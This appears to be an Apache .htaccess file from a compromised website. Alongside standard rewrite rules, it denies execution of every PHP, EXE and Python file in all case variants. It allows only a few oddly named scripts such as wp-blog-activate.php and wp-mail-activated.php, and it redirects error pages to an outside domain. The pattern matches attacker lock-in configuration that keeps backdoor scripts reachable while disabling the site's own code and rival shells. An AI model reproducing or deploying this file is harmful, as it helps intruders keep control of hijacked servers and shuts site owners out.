Options -Indexes

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
ErrorDocument 404 https://coffee-2-go.ro/
ErrorDocument 403 https://coffee-2-go.ro/
<FilesMatch ".*\.(py|exe|EXE|Exe|EXe|ExE|eXE|eXe|exE|phtml|PHTML|Phtml|PhTml|PhtMl|PhtmL|pHtml|pHtml|phTml|phtMl|phtmL|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|php7|PHP5|Php5|PHp5|pHp5|pHP5|phP5|PhP5|PHP7|Php7|PHp7|pHp7|pHP7|phP7|PhP7|php8|PHP8|Php8|PHp8|pHp8|pHP8|phP8|PhP8|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|SSI.shtml|wp-blog-activate.php|about.php|wp-mail-activated.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>
